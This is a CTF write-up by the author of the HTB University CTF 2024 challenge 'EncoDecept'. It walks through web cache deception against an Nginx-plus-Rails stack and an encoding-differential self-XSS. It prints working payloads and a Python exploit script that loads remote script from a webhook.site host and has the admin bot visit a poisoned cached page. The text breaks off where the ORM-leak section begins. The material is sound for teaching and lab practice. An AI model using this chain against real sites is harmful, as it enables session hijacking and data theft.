<!DOCTYPE html><html lang="en" style="--hue:#C8CCFF;--tint:#F0F2FF"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>EncoDecept: HTB University CTF 2024 · xclow3n</title><meta name="description" content="Intended solution for EncoDecept challenge from Hack the Box University CTF 2024 involving Web Cache Deception, encoding differential attacks, and ORM leak exploitation."><link rel="canonical" href="https://xclow3n.com/post/encodecept/"><meta property="og:type" content="article"><meta property="og:title" content="EncoDecept: HTB University CTF 2024 · xclow3n"><meta property="og:description" content="Intended solution for EncoDecept challenge from Hack the Box University CTF 2024 involving Web Cache Deception, encoding differential attacks, and ORM leak exploitation."><meta property="og:url" content="https://xclow3n.com/post/encodecept/"><meta property="og:site_name" content="xclow3n"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="EncoDecept: HTB University CTF 2024 · xclow3n"><meta name="twitter:description" content="Intended solution for EncoDecept challenge from Hack the Box University CTF 2024 involving Web Cache Deception, encoding differential attacks, and ORM leak exploitation."><meta name="author" content="Rajat Raghav"><meta name="theme-color" content="#090C0E"><link rel="icon" href="/favicon.svg" type="image/svg+xml"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Anton&family=Archivo:wght@400;500;600;700&family=JetBrains+Mono:wght@400;700&display=swap"><style>:root{--ground:#090C0E;--ground-2:#11161A;--paper:#FFFFFF;--rule:rgba(255,255,255,.22);--rule-2:rgba(255,255,255,.11);--dim:rgba(255,255,255,.54);--gap:10px;--display:"Anton","Arial Narrow",Haettenschweiler,Impact,sans-serif;--body:"Archivo",-apple-system,"Helvetica Neue",Arial,sans-serif;--mono:"JetBrains Mono",ui-monospace,SFMono-Regular,Menlo,monospace;color-scheme:dark}*,*:before,*:after{margin:0;padding:0;box-sizing:border-box}html{background:var(--ground);-webkit-text-size-adjust:100%;scroll-behavior:smooth}body{background:var(--ground);color:var(--paper);font-family:var(--body);-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;overflow-x:clip}a{color:inherit;text-decoration:none}ul,ol{list-style:none}h1,h2,h3{font-weight:400;font-family:var(--display);text-transform:uppercase}img{max-width:100%;display:block}::selection{background:var(--paper);color:var(--ground)}:root{scrollbar-color:#2A3034 var(--ground);scrollbar-width:thin}::-webkit-scrollbar{width:11px;height:11px}::-webkit-scrollbar-track{background:var(--ground)}::-webkit-scrollbar-thumb{background:#2a3034;border:3px solid var(--ground)}::-webkit-scrollbar-thumb:hover{background:#4a5257}:focus-visible{outline:3px solid var(--paper);outline-offset:2px}.rail{display:flex;flex-wrap:wrap;gap:8px 26px;align-items:baseline;padding:16px 20px 11px;border-bottom:1px solid var(--rule);font-size:10px;letter-spacing:.22em;text-transform:uppercase;font-weight:600}.rail .sp{margin-left:auto}.rail .mut{color:var(--dim);font-weight:500}.rail a:hover{color:var(--paper)}.foot{display:flex;flex-wrap:wrap;gap:10px 26px;align-items:baseline;margin:0 20px;padding:20px 0 26px;border-top:1px solid var(--rule-2);font-size:10px;letter-spacing:.2em;text-transform:uppercase;font-weight:600;color:var(--dim)}.foot .sp{margin-left:auto}.foot a:hover{color:var(--paper)}.fact{display:inline-block;font-family:var(--mono);font-size:10px;font-weight:700;letter-spacing:.1em;text-transform:uppercase;padding:5px 9px 4px}@media(prefers-reduced-motion:reduce){html{scroll-behavior:auto}*,*:before,*:after{animation-duration:.01ms!important;transition-duration:.01ms!important}}@media(max-width:640px){.rail{padding:12px 14px 9px;gap:6px 16px}.foot{margin:0 14px}}
</style><link rel="stylesheet" href="/_astro/_slug_.Cb_o2QD9.css"></head> <body>  <div class="progress" aria-hidden="true"><i id="bar"></i></div> <header class="rail"> <a href="/"><b>&larr; xclow3n</b></a> <span class="mut">Poster 02</span> <span class="sp mut">MY CHALLENGES</span> <time datetime="2024-11">NOV 2024</time> </header>  <section class="head"> <div class="head__text"> <div class="meta"> <span class="num">02</span> <span>Web Cache Deception</span>  </div> <h1>EncoDecept: HTB University CTF 2024</h1> <p class="stand">Intended solution for EncoDecept challenge from Hack the Box University CTF 2024 involving Web Cache Deception, encoding differential attacks, and ORM leak exploitation.</p> <ul class="facts"><li class="fact">web cache deception</li><li class="fact">ORM leak</li></ul> <ul class="tags"><li>CTF</li><li>Web</li><li>Cache Deception</li><li>XSS</li><li>ORM Leak</li><li>Rails</li></ul> </div> <div class="head__art head__art--image" aria-hidden="true"> <img src="/images/posters/encodecept-comic-v1.webp" alt="" width="1003" height="1568" style="--focus:50% 30%" decoding="async" fetchpriority="high"> </div> </section> <div class="reading"> <nav class="toc" aria-label="Sections"> <p class="toc__cap">Contents</p> <ol> <li><a href="#encodecept-web" data-sec="encodecept-web"> <i>01</i><span>EncoDecept (WEB)</span> </a></li><li><a href="#understanding-functionality" data-sec="understanding-functionality"> <i>02</i><span>Understanding functionality</span> </a></li><li><a href="#cache-deception" data-sec="cache-deception"> <i>03</i><span>Cache Deception</span> </a></li><li><a href="#self-xss" data-sec="self-xss"> <i>04</i><span>Self XSS</span> </a></li><li><a href="#orm-leak" data-sec="orm-leak"> <i>05</i><span>ORM Leak</span> </a></li> </ol> </nav> <details class="toc-m"> <summary>Contents &middot; 5 sections</summary> <ol> <li><a href="#encodecept-web"> <i>01</i><span>EncoDecept (WEB)</span> </a></li><li><a href="#understanding-functionality"> <i>02</i><span>Understanding functionality</span> </a></li><li><a href="#cache-deception"> <i>03</i><span>Cache Deception</span> </a></li><li><a href="#self-xss"> <i>04</i><span>Self XSS</span> </a></li><li><a href="#orm-leak"> <i>05</i><span>ORM Leak</span> </a></li> </ol> </details> <article class="doc"><h2 id="encodecept-web">EncoDecept (WEB)</h2>
<p>This is the intended solution for EncoDecept, a challenge I created for Hack the Box University CTF 2024.</p>
<h2 id="understanding-functionality">Understanding functionality</h2>
<p>Visiting the home page displays an auth page we can register and login:</p>
<p><img src="/images/encodecept/login.webp" alt="Login Page"></p>
<p>After registering and logging in, we see the following home page:</p>
<p><img src="/images/encodecept/home.webp" alt="Home Page"></p>
<p>We can create contracts:</p>
<p><img src="/images/encodecept/create.webp" alt="Create Contract"></p>
<p>Update our username, add a bio with markdown support:</p>
<p><img src="/images/encodecept/setting.webp" alt="Settings Page"></p>
<p>And finally report a contract:</p>
<p><img src="/images/encodecept/report.webp" alt="Report Contract"></p>
<p>That’s all the functionality we can access.</p>
<h2 id="cache-deception">Cache Deception</h2>
<p>The challenge uses Nginx as a reverse caching proxy:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="nginx"><code><span class="line"><span style="color:#FF7B72">server</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#FF7B72">    listen </span><span style="color:#79C0FF">1337</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">    server_name </span><span style="color:#E6EDF3">_;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">    location</span><span style="color:#FF7B72"> ~</span><span style="color:#A5D6FF"> \.(css|js|jpg|jpeg|png|gif|ico|woff|woff2|ttf|svg|eot|html|json)$ </span><span style="color:#E6EDF3">{</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_cache </span><span style="color:#E6EDF3">my_cache;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_cache_key </span><span style="color:#A5D6FF">"$</span><span style="color:#E6EDF3">scheme</span><span style="color:#A5D6FF">$</span><span style="color:#E6EDF3">host</span><span style="color:#A5D6FF">$</span><span style="color:#E6EDF3">request_uri</span><span style="color:#A5D6FF">"</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_cache_valid </span><span style="color:#79C0FF">200</span><span style="color:#79C0FF"> 5m</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_cache_valid </span><span style="color:#79C0FF">404</span><span style="color:#79C0FF"> 1m</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_pass </span><span style="color:#E6EDF3">http://127.0.0.1:3000;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">Host $host:$server_port;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">X-Forwarded-Proto $scheme;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">X-Forwarded-For $proxy_add_x_forwarded_for;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_http_version </span><span style="color:#79C0FF">1.1</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">        add_header </span><span style="color:#E6EDF3">X-Cache-Status $upstream_cache_status;</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">    location</span><span style="color:#FFA657"> / </span><span style="color:#E6EDF3">{</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_pass </span><span style="color:#E6EDF3">http://127.0.0.1:3000;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">Host $host:$server_port;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">X-Forwarded-Proto $scheme;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_set_header </span><span style="color:#E6EDF3">X-Forwarded-For $proxy_add_x_forwarded_for;</span></span>
<span class="line"><span style="color:#FF7B72">        proxy_http_version </span><span style="color:#79C0FF">1.1</span><span style="color:#E6EDF3">;</span></span>
<span class="line"><span style="color:#FF7B72">        add_header </span><span style="color:#E6EDF3">X-Cache-Status $upstream_cache_status;</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">}</span></span></code></pre>
<p>This configuration caches all resources that end with certain extensions and routes all traffic to the Rails application. This stack setup makes it vulnerable to <strong>Web Cache Deception</strong>. According to <a href="https://portswigger.net/research/gotta-cache-em-all#cachepoisoning">this research</a>, Rails uses a custom delimiter, the <code>.</code> character:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Dot in Rails: Ruby on Rails allows the client to send a path with a formatter extension, which defines the view returned in the response. This is used to return different responses with different content types. If no extension is used or the extension isn't recognized by the server, the default HTML view is returned. Therefore, the dot character can act as a path delimiter.</span></span></code></pre>
<p>With a payload like <code>/profile.ico</code>, we can poison the cache. However, to escalate further, we need an XSS or self-XSS vulnerability.</p>
<h2 id="self-xss">Self XSS</h2>
<p>The application supports markdown on the settings page:</p>
<p><img src="/images/encodecept/setx.webp" alt="Settings with Markdown"></p>
<p>This is not directly vulnerable to XSS, but examining the server headers reveals:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="http"><code><span class="line"><span style="color:#FF7B72">HTTP</span><span style="color:#E6EDF3">/</span><span style="color:#79C0FF">1.1</span><span style="color:#79C0FF"> 200</span><span style="color:#A5D6FF"> OK</span></span>
<span class="line"><span style="color:#7EE787">Server</span><span style="color:#FF7B72">:</span><span style="color:#A5D6FF"> nginx/1.26.2</span></span>
<span class="line"><span style="color:#7EE787">Date</span><span style="color:#FF7B72">:</span><span style="color:#A5D6FF"> Fri, 15 Nov 2024 23:22:46 GMT</span></span>
<span class="line"><span style="color:#7EE787">Content-Type</span><span style="color:#FF7B72">:</span><span style="color:#A5D6FF"> text/html</span></span>
<span class="line"><span style="color:#E6EDF3">...SNIP...</span></span></code></pre>
<p>The <code>Content-Type</code> header does not specify a charset, and the charset is not defined with a meta tag either. This makes the page vulnerable to encoding differential attacks, as explained in <a href="https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/">this research</a>. Switching to the JIS X 0208 1978 charset lets us break out of the HTML context. I used a proxy to send the following request and update the <code>bio</code>:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#FFA657">curl</span><span style="color:#A5D6FF"> 'http://127.0.0.1:1337/settings'</span><span style="color:#79C0FF"> -X</span><span style="color:#A5D6FF"> POST</span><span style="color:#A5D6FF"> ...SNIP...</span><span style="color:#79C0FF"> --data-raw</span><span style="color:#A5D6FF"> '_method=patch&#x26;authenticity_token=loph8GcIcxns14fBxvHfIT69DosomkrGvXrdX_jcbPzuYgEeGB-UergMjfFG9crk3HGhHUjZ6sgBD_GKvLlgAw&#x26;username=test&#x26;bio=![%1b$@](test.png)+superman+![batman](shaktiman.png)&#x26;commit=Update+Settings'</span></span></code></pre>
<p>We pass the following as the bio: <code>![%1b$@](test.png)+superman+![batman](shaktiman.png)</code>. If this works, we should see a bunch of random characters.</p>
<p><img src="/images/encodecept/ran.webp" alt="Random Characters Output"></p>
<p>The encoding differential worked in Chrome. I then used the following payload to execute JavaScript: <code>![%1b$@](test.png)+%1B(B+![batman](onerror=alert(1)//)</code></p>
<p><img src="/images/encodecept/al.webp" alt="XSS Alert Box"></p>
<p>An alert box appears, confirming the XSS vulnerability. Next, we move on to the report functionality. The report feature takes a URL and simply visits it:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> startChromiumBot</span><span style="color:#E6EDF3">(url):</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_options </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> Options()</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_options.binary_location </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "/usr/bin/chromium-browser"</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_options.add_argument(</span><span style="color:#A5D6FF">"--headless"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_options.add_argument(</span><span style="color:#A5D6FF">"--no-sandbox"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_options.add_argument(</span><span style="color:#A5D6FF">"--disable-dev-shm-usage"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    chrome_service </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> Service(</span><span style="color:#A5D6FF">"/usr/bin/chromedriver"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    driver </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> webdriver.Chrome(</span><span style="color:#FFA657">service</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">chrome_service, </span><span style="color:#FFA657">options</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">chrome_options)</span></span>
<span class="line"><span style="color:#FF7B72">    try</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#E6EDF3">        driver.get(</span><span style="color:#A5D6FF">'http://127.0.0.1:1337/login'</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">        WebDriverWait(driver, </span><span style="color:#79C0FF">15</span><span style="color:#E6EDF3">).until(</span></span>
<span class="line"><span style="color:#79C0FF">            EC</span><span style="color:#E6EDF3">.presence_of_element_located((By.</span><span style="color:#79C0FF">ID</span><span style="color:#E6EDF3">, </span><span style="color:#A5D6FF">"loginBtn"</span><span style="color:#E6EDF3">))</span></span>
<span class="line"><span style="color:#E6EDF3">        )</span></span>
<span class="line"><span style="color:#E6EDF3">        username </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "contract_manager"</span></span>
<span class="line"><span style="color:#E6EDF3">        password </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> get_contract_manager_password()</span></span>
<span class="line"><span style="color:#E6EDF3">        input1 </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> driver.find_element(By.</span><span style="color:#79C0FF">XPATH</span><span style="color:#E6EDF3">, </span><span style="color:#A5D6FF">'/html/body/code/section/div/div/div/form/div[1]/input'</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">        input2 </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> driver.find_element(By.</span><span style="color:#79C0FF">XPATH</span><span style="color:#E6EDF3">, </span><span style="color:#A5D6FF">'/html/body/code/section/div/div/div/form/div[2]/input'</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">        input1.send_keys(username)</span></span>
<span class="line"><span style="color:#E6EDF3">        input2.send_keys(password)</span></span>
<span class="line"><span style="color:#E6EDF3">        submit_button </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> driver.find_element(By.</span><span style="color:#79C0FF">ID</span><span style="color:#E6EDF3">, </span><span style="color:#A5D6FF">"loginBtn"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">        driver.execute_script(</span><span style="color:#A5D6FF">"arguments[0].click();"</span><span style="color:#E6EDF3">, submit_button)</span></span>
<span class="line"><span style="color:#E6EDF3">        driver.get(url)</span></span>
<span class="line"><span style="color:#FF7B72">    finally</span><span style="color:#E6EDF3">:</span></span>
<span class="line"><span style="color:#E6EDF3">        driver.quit()</span></span></code></pre>
<p>I automated the registration, profile update, cache deception, and report steps with this script:</p>
<pre class="astro-code github-dark-default" style="background-color:#0d1117;color:#e6edf3; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> requests</span></span>
<span class="line"><span style="color:#FF7B72">from</span><span style="color:#E6EDF3"> bs4 </span><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> BeautifulSoup</span></span>
<span class="line"><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> random</span></span>
<span class="line"><span style="color:#FF7B72">import</span><span style="color:#E6EDF3"> base64</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> generate_random_4digit</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#FF7B72">    return</span><span style="color:#FF7B72"> f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">random.randint(</span><span style="color:#79C0FF">1000</span><span style="color:#E6EDF3">, </span><span style="color:#79C0FF">9999</span><span style="color:#E6EDF3">)</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">"</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E6EDF3">username </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> generate_random_4digit()</span></span>
<span class="line"><span style="color:#E6EDF3">password </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> generate_random_4digit()</span></span>
<span class="line"><span style="color:#E6EDF3">base_url </span><span style="color:#FF7B72">=</span><span style="color:#A5D6FF"> "http://127.0.0.1:1337"</span></span>
<span class="line"><span style="color:#E6EDF3">session </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> requests.Session()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> getAuthenToken</span><span style="color:#E6EDF3">(html):</span></span>
<span class="line"><span style="color:#E6EDF3">    soup </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> BeautifulSoup(html, </span><span style="color:#A5D6FF">"html.parser"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#FF7B72">    return</span><span style="color:#E6EDF3"> soup.find(</span><span style="color:#A5D6FF">"input"</span><span style="color:#E6EDF3">, {</span><span style="color:#A5D6FF">"name"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"authenticity_token"</span><span style="color:#E6EDF3">})[</span><span style="color:#A5D6FF">"value"</span><span style="color:#E6EDF3">]</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> register</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    register_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/register"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    register_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(register_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    register_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "username"</span><span style="color:#E6EDF3">: username,</span></span>
<span class="line"><span style="color:#A5D6FF">        "password"</span><span style="color:#E6EDF3">: password,</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/register"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">register_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> login</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    login_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/login"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    login_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(login_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    login_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "username"</span><span style="color:#E6EDF3">: username,</span></span>
<span class="line"><span style="color:#A5D6FF">        "password"</span><span style="color:#E6EDF3">: password,</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/login"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">login_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> updateSettings</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    setting_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/settings"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    setting_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(setting_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    setting_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "_method"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"patch"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "username"</span><span style="color:#E6EDF3">: username,</span></span>
<span class="line"><span style="color:#A5D6FF">        "bio"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"![</span><span style="color:#FF7B72">\x1b</span><span style="color:#A5D6FF">$@](test.png)+</span><span style="color:#FF7B72">\x1B</span><span style="color:#A5D6FF">(B+![batman](onerror=s=document.createElement('script');s.src='https://webhook.site/aa05fd5b-f4da-42ee-9c08-75cc1d9a6de9';document.body.appendChild(s);//)"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "commit"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"Update Settings"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/settings"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">setting_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> cachePoison</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/settings.ico"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/settings.ico"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#FF7B72">def</span><span style="color:#D2A8FF"> reportURL</span><span style="color:#E6EDF3">():</span></span>
<span class="line"><span style="color:#E6EDF3">    report_page </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.get(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/report"</span><span style="color:#E6EDF3">)</span></span>
<span class="line"><span style="color:#E6EDF3">    report_page.raise_for_status()</span></span>
<span class="line"><span style="color:#E6EDF3">    authenticity_token </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> getAuthenToken(report_page.text)</span></span>
<span class="line"><span style="color:#E6EDF3">    report_payload </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> {</span></span>
<span class="line"><span style="color:#A5D6FF">        "contract_url"</span><span style="color:#E6EDF3">: </span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/settings.ico"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "commit"</span><span style="color:#E6EDF3">: </span><span style="color:#A5D6FF">"Report"</span><span style="color:#E6EDF3">,</span></span>
<span class="line"><span style="color:#A5D6FF">        "authenticity_token"</span><span style="color:#E6EDF3">: authenticity_token</span></span>
<span class="line"><span style="color:#E6EDF3">    }</span></span>
<span class="line"><span style="color:#E6EDF3">    response </span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3"> session.post(</span><span style="color:#FF7B72">f</span><span style="color:#A5D6FF">"</span><span style="color:#FF7B72">{</span><span style="color:#E6EDF3">base_url</span><span style="color:#FF7B72">}</span><span style="color:#A5D6FF">/report"</span><span style="color:#E6EDF3">, </span><span style="color:#FFA657">data</span><span style="color:#FF7B72">=</span><span style="color:#E6EDF3">report_payload)</span></span>
<span class="line"><span style="color:#E6EDF3">    response.raise_for_status()</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E6EDF3">register()</span></span>
<span class="line"><span style="color:#E6EDF3">login()</span></span>
<span class="line"><span style="color:#E6EDF3">updateSettings()</span></span>
<span class="line"><span style="color:#E6EDF3">cachePoison()</span></span>
<span class="line"><span style="color:#E6EDF3">reportURL()</span></span></code></pre>
<p>This script registers a new user, logs in, updates the bio with an XSS payload, performs cache deception, and reports it. On our webhook, we receive a request:</p>
<p><img src="/images/encodecept/hk.webp" alt="Webhook Request"></p>
<h2 id="orm-leak">ORM Leak</h2>
<p>The XSS runs as <code>contract_manager</code>, but its cookie is <code>HttpOnly</code>. The useful attack surface is therefore the functionality available to that account. The Django API includes this endpoint:</p>
